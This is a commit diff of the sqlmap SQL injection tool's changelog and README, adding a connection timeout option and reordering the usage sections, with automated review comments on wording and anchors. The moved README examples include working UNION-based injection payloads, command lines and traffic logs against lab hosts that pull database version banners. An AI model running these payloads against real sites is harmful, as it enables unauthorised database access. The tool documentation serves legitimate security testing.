sqlmap 0.6.3-rc4:

Minor enhancement to be able to specify the number of seconds before
the connection times out, default is set to 10 seconds.
Minor improvement to retry the HTTP request up to three times in case
an exception is raised during the connection to the target url.
Minor bug fix to correctly catch connection exceptions and notify
the user also if they occur within a thread.
Minor code restyling.
Updated documentation.
This commit is contained in:
Bernardo Damele 2008-12-04 17:40:03 +00:00
parent 0f07e33e1a
commit 7f055924a7
16 changed files with 748 additions and 571 deletions

@ -13,6 +13,8 @@ sqlmap (0.6.3-1) stable; urgency=low
the web application technology by parsing some HTTP response headers;
* Minor enhancement to fingerprint the back-end DBMS operating system by
parsing the DBMS banner value when -b option is provided;
* Minor enhancement to be able to specify the number of seconds before
timeout the connection, default is set to 10 seconds;
* Minor enhancement to be able to specify the number of seconds to wait
between each HTTP request providing option --delay #;
* Minor enhancement to be able to enumerate table columns and dump table
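Review bot: the new changelog entry for the connection timeout does not name the option it introduces, while the neighbouring entry does (`providing option --delay #`); write it as `... providing option --timeout #, default is set to 10 seconds;` and fix the grammar from `before timeout the connection` to `before the connection times out`.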
@ -23,15 +25,20 @@ sqlmap (0.6.3-1) stable; urgency=low
client HTTP headers (Accept, Accept-Encoding, etc);
* Minor improvements to sqlmap Debian package files: sqlmap uploaded
to official Debian project repository, on queue at the moment;
* Major bug fix to correctly handle httplib.BadStatusLine exception;
* Minor bug fix to handle session.error and session.timeout in HTTP
requests;
* Minor bug fix so that when the user provide a SELECT statement to be
* Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
library if available to speed up the sqlmap algorithmic operations;
* Minor improvement to retry the HTTP request up to three times in case
an exception is raised during the connection to the target url;
* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
* Major bug fix so that when the user provide a SELECT statement to be
processed with an asterisk as columns, now it also work if in the FROM
there is no database name specified;
* Minor bug fix to correctly enumerate columns on Microsoft SQL Server;
* Minor bug fix to correctly dump table entries when the column is
provided;
* Minor bug fix to correctly handle session.error, session.timeout and
httplib.BadStatusLine exceptions in HTTP requests;
* Minor bug fix to correctly catch connection exceptions and notify to
the user also if they occur within a thread;
* Increased default output level from 0 to 1;
* Updated documentation.
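Review bot: two severity labels change in this reordering without the commit message saying so: the `httplib.BadStatusLine` fix drops from `Major bug fix` to `Minor bug fix` when it is merged with the `session.error`/`session.timeout` entry, and the Microsoft SQL Server column enumeration fix goes from `Minor bug fix` to `Major bug fix`. Either may be intended, but state it. Also fix the grammar in the retained SELECT entry: `when the user provides a SELECT statement ... now it also works`.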

@ -37,14 +37,15 @@ for the latest version.</EM>
<H2><A NAME="toc5">5.</A> <A HREF="README.html#s5">Usage</A></H2>
<UL>
<LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Request</A>
<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Techniques</A>
<LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Target</A>
<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Request</A>
<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Injection</A>
<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Fingerprint</A>
<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Enumeration</A>
<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">File system access</A>
<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Operating system access</A>
<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Miscellaneous</A>
<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Techniques</A>
<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Fingerprint</A>
<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Enumeration</A>
<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">File system access</A>
<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Operating system access</A>
<LI><A NAME="toc5.9">5.9</A> <A HREF="README.html#ss5.9">Miscellaneous</A>
</UL>
<P>
<H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">Disclaimer</A></H2>
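Review bot: inserting Target as 5.1 shifts every `toc5.x`/`ss5.x` anchor from 5.2 onward, so `README.html#ss5.2` now resolves to Request instead of Techniques, `#ss5.4` to Techniques instead of Fingerprint, and so on down to `#ss5.8`; any bookmark or external link into the old numbering silently lands on the wrong section. Consider naming anchors after the section (`#request`, `#techniques`) so that adding a section does not invalidate the rest.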
@ -84,10 +85,13 @@ Windows users can download and install the Python setup-ready installer
for x86, AMD64 and Itanium too.</P>
<P>Optionally, if you are running sqlmap on Windows, you may wish to install
<A HREF="http://ipython.scipy.org/moin/PyReadline/Intro">PyReadline</A>
to be able to take advantage of the sqlmap TAB completion and history
support functionalities in the SQL shell and OS shell.
library to be able to take advantage of the sqlmap TAB completion and
history support functionalities in the SQL shell and OS shell.
Note that these functionalities are available natively by Python official
readline library on other operating systems.</P>
readline library on other operating systems.
You can also choose to install
<A HREF="http://psyco.sourceforge.net/">Psyco</A>
library to speed up the sqlmap algorithmic operations.</P>
<H2><A NAME="ss1.2">1.2</A> <A HREF="#toc1.2">Scenario</A>
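Review bot: moving the `</P>` so the paragraph closes after the Psyco sentence is correct, but the surrounding wording is awkward: `available natively by Python official readline library` should read `available natively through Python's official readline module`, and `install <A ...>Psyco</A> library` should be `install the <A ...>Psyco</A> library`, matching the `PyReadline</A> library` phrasing two lines above.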
@ -348,20 +352,25 @@ $ python sqlmap.py -h
sqlmap/0.6.3 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
and Daniele Bellucci &lt;daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u "&lt;URL>" | -g "&lt;google dork>" | -c "&lt;config file>"}
Usage: sqlmap.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
Request:
These options have to be specified to set the target url, HTTP method,
how to connect to the target url or Google dorking results in general.
Target:
At least one of these options has to be specified to set the source to
get target urls from.
-u URL, --url=URL Target url
-l LIST Parse targets from Burp or WebScarab logs
-g GOOGLEDORK Process Google dork results as target urls
-p TESTPARAMETER Testable parameter(s)
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
--method=METHOD HTTP method, GET or POST (default: GET)
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
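Review bot: replacing the synopsis `{-u "<URL>" | -g "<google dork>" | -c "<config file>"}` with a bare `Usage: sqlmap.py [options]` removes the one place where the mandatory source is visible at a glance; the new `Target:` text says `At least one of these options has to be specified`, but the synopsis now implies every option is optional. Since `-l LIST` is also a target source, extend the old synopsis to `{-u "<URL>" | -l "<log file>" | -g "<google dork>" | -c "<config file>"}` instead of dropping it.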
@ -373,8 +382,10 @@ Options:
--proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 10)
Injection:
-p TESTPARAMETER Testable parameter(s)
--string=STRING String to match in page when the query is valid
--dbms=DBMS Force back-end DBMS to this value
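Review bot: grammar in the new `--timeout` help string: `Seconds to wait before timeout connection (default 10)` should be `Seconds to wait before the connection times out (default 10)`. The `--delay` line directly above shows neither a default nor that it takes a float, while the README says both `--delay` and `--timeout` accept floats; make the two help strings say the same things in the same form.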
@ -385,11 +396,11 @@ Options:
--time-test Test for Time based blind SQL injection
--union-test Test for UNION query (inband) SQL injection
--union-use Use the UNION query (inband) SQL injection to
retrieve the queries output. No need to go blind
--union-use Use the UNION query (inband) SQL injection to retrieve
the queries output. No need to go blind
Fingerprint:
-f, --fingerprint Perform an extensive database fingerprint
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database
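Review bot: in the reflowed `--union-use` help, `the queries output` needs a possessive or rewording, e.g. `the query output` or `the queries' output`. The new `-f` text `Perform an extensive DBMS version fingerprint` is an improvement, but the README section heading for the same option, `Extensive database management system fingerprint`, keeps the old wording; align the two.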
@ -438,10 +449,9 @@ Options:
Miscellaneous:
--eta Retrieve each query output length and calculate the
estimated time of arrival in real time
-v VERBOSE Verbosity level: 0-5 (default 0)
-v VERBOSE Verbosity level: 0-5 (default 1)
--update Update sqlmap to the latest stable version
-s SESSIONFILE Save and resume all data retrieved on a session file
-c CONFIGFILE Load options from a configuration INI file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
</PRE>
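Review bot: `-c CONFIGFILE` leaves `Miscellaneous:` for `Target:`, but its counterpart `--save` (write the same INI file) stays under `Miscellaneous:`, so a user reading one option will not find the other; either keep both in `Miscellaneous:` or move `--save` next to `-c`. The `-v` default change from `0` to `1` matches the changelog line `Increased default output level from 0 to 1`, but it is a user-visible behaviour change for anyone scripting sqlmap, so flag it as such rather than burying it under help-text edits.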
@ -449,7 +459,7 @@ Options:
</P>
<H2><A NAME="ss5.1">5.1</A> <A HREF="#toc5.1">Request</A>
<H2><A NAME="ss5.1">5.1</A> <A HREF="#toc5.1">Target</A>
</H2>
<H3>Target URL</H3>
@ -675,7 +685,7 @@ Content-Type: text/html
</P>
<H3>List of targets</H3>
<H3>Parse targets from Burp or WebScarab logs</H3>
<P>Option: <CODE>-l</CODE></P>
@ -725,90 +735,33 @@ want to test this url? [y/N/q] y
</P>
<H3>Testable parameter(s)</H3>
<H3>Load options from a configuration INI file</H3>
<P>Option: <CODE>-p</CODE></P>
<P>Option: <CODE>-c</CODE></P>
<P>By default sqlmap tests all <CODE>GET</CODE> parameters, <CODE>POST</CODE>
parameters, HTTP <CODE>Cookie</CODE> header values and HTTP <CODE>User-Agent</CODE>
header value for dynamicity and SQL injection vulnerability, but it is
possible to manually specificy the parameter(s) you want sqlmap to perform
tests on comma separeted in order to skip dynamicity tests and perform SQL
injection test and inject directly only against the provided parameter(s).</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "id"
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Or, if you want to provide more than one parameter, for instance:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "cat,id"
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>You can also test only the HTTP <CODE>User-Agent</CODE> header.</P>
<P>It is possible to pass user's options from a configuration INI file, an
example is <CODE>sqlmap.conf</CODE>.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:41] [INFO] url is stable
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Note that if you also provide other options from command line, those are
evaluated when running sqlmap and overwrite the same options, if set, in
the configuration file provided.</P>
<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Request</A>
</H2>
<H3>HTTP method: <CODE>GET</CODE> or <CODE>POST</CODE></H3>
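Review bot: the example transcript under the new `-c` section is spliced from two different runs: it reports `User-Agent parameter 'User-Agent' is dynamic` and `string/single quote injectable`, then ends with `[WARNING] User-Agent parameter 'User-Agent' is not dynamic` and `[WARNING] GET parameter 'cat' is not dynamic`, which cannot both come from one invocation. The first line, `the testable parameter 'user-agent' you provided is not into the GET`, also only makes sense if `sqlmap.conf` sets the testable parameter, which the text never says. Regenerate the output from a single run of `sqlmap.py -c "sqlmap.conf"` and state which options the example `sqlmap.conf` sets. Minor: `pass user's options` should be `pass the user's options`.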
@ -1213,162 +1166,102 @@ seven HTTP requests, the maximum to retrieve a query output character.</P>
request. The valid value is a float, for instance 0.5.</P>
<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Techniques</A>
<H3>Seconds to wait before timeout connection</H3>
<P>Option: <CODE>--timeout</CODE></P>
<P>It is possible to specify a number of seconds to wait before considering
the HTTP connection timed out. The valid value is a float, for instance
10.5.</P>
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Injection</A>
</H2>
<H3>Test for Time Based Blind SQL injection</H3>
<H3>Testable parameter(s)</H3>
<P>Option: <CODE>--time-test</CODE></P>
<P>TODO</P>
<H3>Test for UNION query SQL injection</H3>
<P>Option: <CODE>--union-test</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Option: <CODE>-p</CODE></P>
<P>By default sqlmap tests all <CODE>GET</CODE> parameters, <CODE>POST</CODE>
parameters, HTTP <CODE>Cookie</CODE> header values and HTTP <CODE>User-Agent</CODE>
header value for dynamicity and SQL injection vulnerability, but it is
possible to manually specificy the parameter(s) you want sqlmap to perform
tests on comma separeted in order to skip dynamicity tests and perform SQL
injection test and inject directly only against the provided parameter(s).</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "id"
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.</P>
<H3>Use the UNION query SQL injection</H3>
<P>Option: <CODE>--union-use</CODE></P>
<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
the target URL is affected by an <B>inband SQL injection</B>
(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <CODE>SELECT</CODE> queries.</P>
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
<P>Or, if you want to provide more than one parameter, for instance:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "cat,id"
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
<P>You can also test only the HTTP <CODE>User-Agent</CODE> header.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:41] [INFO] url is stable
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.</P>
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Injection</A>
</H2>
<H3>String match</H3>
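Review bot: typos carried into the moved `-p` paragraph: `specificy` should be `specify` and `comma separeted` should be `comma separated`; `dynamicity` is used twice where `whether it is dynamic` reads better. The User-Agent example now targets `ua_str.php` and the transcript correctly no longer ends with the `GET parameter 'cat' is not dynamic` warning, but its first line, `the testable parameter 'user-agent' you provided is not into the GET`, should read `is not among the GET parameters`; that string is emitted by sqlmap itself, so the fix belongs in the source as well as in this transcript. The new `--timeout` paragraph (float, e.g. `10.5`) is consistent with the `(default 10)` help string.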
@ -1564,7 +1457,161 @@ back-end database management system. If you do not know it, let sqlmap
automatically identify it for you.</P>
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Fingerprint</A>
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Techniques</A>
</H2>
<H3>Test for Time Based blind SQL injection</H3>
<P>Option: <CODE>--time-test</CODE></P>
<P>TODO</P>
<H3>Test for UNION query SQL injection</H3>
<P>Option: <CODE>--union-test</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.</P>
<H3>Use the UNION query SQL injection</H3>
<P>Option: <CODE>--union-use</CODE></P>
<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
the target URL is affected by an <B>inband SQL injection</B>
(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <CODE>SELECT</CODE> queries.</P>
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
